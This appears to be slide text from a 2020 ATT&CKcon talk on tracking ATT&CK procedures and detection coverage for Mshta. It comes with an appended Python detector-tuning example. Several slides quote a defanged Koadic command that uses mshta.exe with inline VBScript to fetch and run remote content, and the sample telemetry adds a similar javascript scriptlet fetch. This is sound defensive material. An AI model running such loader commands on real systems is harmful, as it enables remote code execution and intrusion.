From MITRE ATT&CKcon Power Hour December 2020
By Katie Nickels, Director of Intelligence, Red Canary
Good analysts (and good human beings) change their minds based on new information. In this presentation, Katie will share how her perspectives on ATT&CK have changed since moving from ATT&CK team member to ATT&CK end-user. She will discuss how her ideas about coverage, procedures, and detection creation have evolved and why those perspectives matter. Katie will also share practical examples from observed threats to help explain the nuances of her perspectives. Attendees should expect to leave this presentation with a better understanding of how to handle challenges they’re likely to face when navigating their own ATT&CK journey.
From Theory to Practice: How My ATT&CK Perspectives Have Changed
1. From Theory to Practice: How My ATT&CK® Perspectives Have Changed
Katie Nickels
ATT&CKcon Power Hour
December 11, 2020
2. Yes, this is being recorded. Yes, the slides will be shared. No, I don’t know when. Soon.
3. About Me
§ Former MITRE ATT&CK Team Member (relevant)
§ SANS Certified Instructor for FOR578: Cyber Threat Intelligence
§ Bringing context about threats to inform decisions
§ Maintaining sanity with exercise, chocolate, containers, and holiday lights
Katie Nickels, Director of Intelligence, Red Canary, @LiketheCoins
7. Tracking TTPs the MITRE way
https://attack.mitre.org/techniques/T1218/005/
Tactic: Defense Evasion
Technique/Sub-technique: Signed Binary Proxy Execution: Mshta
Procedure: Koadic can use MSHTA to serve additional payloads.[13]
10. Example of tracking beyond TTPs
Defense Evasion/Execution
T1218.005 Signed Binary Proxy Execution: Mshta
Koadic used VBScript to launch mshta.exe and make an external network connection
C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
11. Primary Tactic: Execution
Additional Tactics: TA0005 Defense Evasion
Techniques: T1218.005 Signed Binary Proxy Execution: Mshta; T1059.005 Command and Scripting Interpreter: Visual Basic
Procedure ★: Koadic uses VBScript to launch mshta.exe and make an external network connection.
Observable: C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close)
Detectors (Name / Targeted to this profile?)
WIN-MSHTA-CLI-URL / No
WIN-MSHTA-NON-HTA / No
WIN-MSHTA-INLINE-VBSCRIPT / No
12. What this format lets us do
§ Track detailed observables from endpoint telemetry
§ Identify where we have detection coverage (or not)
§ Use ATT&CK tactics, techniques, and sub-techniques
...but add on because it meets our needs
14. Defining coverage by confidence
https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
15. The challenge of unlimited procedures
“You should also remember that each ATT&CK technique may have many procedures for how an adversary could implement it — and because adversaries are always changing, we can’t know what all those procedures are in advance.”
https://medium.com/mitre-attack/how-to-be-a-savvy-attack-consumer-63e45b8e94c9
16. Katie: “There are unlimited procedures!”
§ Matt: “But are there?”
o Think of techniques like MSHTA
o Commands only have so many flags
§ We may be able to scope some technique variations
19. Nine known variations for HTA
1. HTA can have any file name and extension
2. Specifying a URI from where HTA content is first downloaded
3. Use of scripting engines
4. Specifying protocol handlers (e.g., “vbscript”, “javascript”, “about”)
5. HTA content embedded and executed from within other file formats
6. HTA content can be executed remotely via UNC paths.
7. Remote HTA execution via COM interface (lateral movement)
8. HTA execution by double clicking or invoking with “explorer.exe foo.hta”
9. Full control over the path and filename of mshta.exe and rundll32.exe
https://redcanary.com/blog/threat-research-questions
20. Adding in variations
Defense Evasion/Execution
T1218.005 Signed Binary Proxy Execution: Mshta
Variations: specifying protocol handler + direct download from URI
Koadic used VBScript to launch mshta.exe and make an external network connection
C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
21. Mix and match the variations
Specifying protocol handler: vbscript:
Direct download from URI: mshta hxxp[:]//8.8.8[.]8:123/
Specifying protocol handler: jscript:
https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/TestHarnesses/T1218.005_Mshta
22. Testing known variation combinations
More granular: 25 tested combinations
Less granular: 1 technique, T1218.005 Signed Binary Proxy Execution: Mshta
24. Remember that profile breakdown?
Techniques: T1218.005 Signed Binary Proxy Execution: Mshta; T1059.005 Command and Scripting Interpreter: Visual Basic
Observable: Koadic uses VBScript to launch mshta.exe and make an external network connection.
C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close)
Detectors (Name / Targeted to this profile?)
WIN-MSHTA-CLI-URL / No
WIN-MSHTA-NON-HTA / No
WIN-MSHTA-INLINE-VBSCRIPT / No
25. Mapping coverage based on threats
More granular: 6 threat observables for Mshta
Koadic observable 1
Koadic observable 2
FIN7 observable 1
FIN7 observable 2
Kovter observable 1
Lazarus observable 1
Less granular: 1 technique, T1218.005 Signed Binary Proxy Execution: Mshta
28. Diving deeper
HTA test harness results
Mshta threat observables:
Koadic observable 1
Koadic observable 2
FIN7 observable 1
FIN7 observable 2
Lazarus observable 1
These are okay too!
29. Expressing coverage is just tough
§ Any way you express it will have limitations
§ There’s no “right” or “wrong” way to do it
...but there may be “better” ways for your needs
§ Figure out the requirement for what you’re doing
o What are you trying to convey and achieve?
o What’s your goal of expressing the coverage?
31. Finding “good” detection opportunities
§ Not everything is useful for detection
§ Choosing is most of the battle
https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
32. Discovery techniques
§ “Discovery techniques aren’t that useful for detection”
https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
34. Testing & tuning is most of the work
§ “This should NEVER happen in an environment, let’s write a detection analytic!” —Me in January 2020
§ “Here’s a hypothesis that will probably be noisy so here are five ways to tune it when that happens.” —Me in December 2020
§ If an analytic is noisy…how can we tune it?
o Narrow it down? Use threat intelligence.
o Easily suppress on false positives?
https://redcanary.com/blog/tuning-detectors/
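The variation breakdown on slides 20 and 21, the detector names on slide 24, and the tuning questions on slide 34, as an added Python example that is not from the talk or from Red Canary: it maps constructed command-line telemetry to the three detector names from the slides (their matching logic is assumed from the names, not Red Canary's real detectors), then applies a labelled false-positive suppression and a threat-intel narrowing step built from the Koadic observable.

```python
import re
from collections import namedtuple

Event = namedtuple("Event", "parent cmdline")
# Constructed sample endpoint telemetry. The first command line is the Koadic
# observable from the slides (URL kept defanged); the other events are invented.
SAMPLE_EVENTS = [
    Event("wscript.exe", r'C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)'),
    Event("explorer.exe", r'C:\Windows\system32\mshta.exe C:\Users\alice\Desktop\report.hta'),
    Event("cmd.exe", r'mshta.exe javascript:a=GetObject("script:hxxp[:]//example[.]invalid/x.sct").Exec();close()'),
    Event("msiexec.exe", r'C:\Windows\system32\mshta.exe C:\ProgramData\ExampleVendor\setup.txt'),
    Event("explorer.exe", r'C:\Windows\notepad.exe notes.txt'),
]

MSHTA_RE = re.compile(r'(?:^|\\)mshta(?:\.exe)?\b', re.I)          # image is mshta.exe
HANDLER_RE = re.compile(r'^(vbscript|javascript|jscript|about):', re.I)  # variation 4
URL_RE = re.compile(r'\b(?:hxxps?|https?)\[?:\]?//', re.I)          # variation 2 (defanged too)

def detectors(cmdline):
    """Map one command line to the slide-24 detector names (logic assumed from the names)."""
    hits = set()
    if not MSHTA_RE.search(cmdline):
        return hits                              # not an mshta.exe execution at all
    args = cmdline.split(None, 1)[1].strip('"') if " " in cmdline else ""
    handler = HANDLER_RE.match(args)
    if handler and handler.group(1).lower() == "vbscript":
        hits.add("WIN-MSHTA-INLINE-VBSCRIPT")    # inline vbscript: protocol handler
    if URL_RE.search(cmdline):
        hits.add("WIN-MSHTA-CLI-URL")            # URI on the command line
    if args and not args.lower().endswith(".hta"):
        hits.add("WIN-MSHTA-NON-HTA")            # variation 1: argument is not a .hta
    return hits

# Tuning knobs (constructed): a suppression for one known false positive, with the
# reason recorded so the decision is auditable, and a threat-intel pattern for Koadic.
SUPPRESSIONS = [
    ("WIN-MSHTA-NON-HTA", lambda e: e.parent.lower() == "msiexec.exe"
     and "\\programdata\\examplevendor\\" in e.cmdline.lower(),
     "ExampleVendor installer runs mshta on a .txt payload (constructed FP)"),
]
THREAT_INTEL = {"Koadic": re.compile(r'vbscript:.*WScript\.Shell.*mshta', re.I)}

def triage(event):
    """Run detectors, drop suppressed hits, and tag events that match threat intel."""
    hits = detectors(event.cmdline)
    for name, is_known_good, _reason in SUPPRESSIONS:
        if name in hits and is_known_good(event):
            hits.discard(name)                   # suppress, narrowing the noisy hypothesis
    threats = [t for t, rx in THREAT_INTEL.items() if rx.search(event.cmdline)]
    return {"detectors": sorted(hits), "threats": threats}
```

Running `triage` over `SAMPLE_EVENTS` shows the Koadic line tripping all three detectors with a threat-intel tag, the plain `.hta` double-click producing nothing, and the installer false positive being suppressed with its reason on record.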
36. Takeaways
§ Don’t limit yourself to just TTPs if you need to go further
§ Define detection coverage based on your requirements
§ Trial, error, and experience will help you choose what to detect
§ It’s a good thing to change your perspectives
§ Surrounding yourself with new people and new situations lets you think differently and mature